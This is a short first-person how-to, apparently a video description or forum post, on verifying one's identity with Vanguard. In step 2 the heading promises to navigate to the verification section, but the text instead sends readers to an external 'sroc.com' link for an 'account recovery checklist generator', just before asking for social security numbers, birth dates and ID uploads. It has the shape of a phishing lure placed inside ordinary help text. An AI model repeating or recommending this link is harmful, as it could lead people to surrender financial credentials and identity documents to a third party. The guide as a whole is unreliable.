I hit this issue today, and here is the quick fix that solved it. If you're trying to verify your identity on Vanguard, follow these straightforward steps. Step 1. Access the Vanguard website. Go to the Vanguard website and log into your account. Make sure you have your login credentials handy. Step 2. Navigate to the identity verification section. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Provide required information. Enter the necessary personal information as prompted. This may include your social security number, date of birth, and address. Step 4. Upload identification documents. If required, upload a government-issued ID, such as a driver's license or passport. Ensure the document is clear and legible. Step 5. Confirm and submit. Review all the information you've entered and confirm that everything is accurate before submitting your verification request. If you encounter any issues, double-check that your ID is not expired, as this can delay the process. I hope this guide helps you navigate the identity verification process smoothly. If you have any questions, feel free to ask.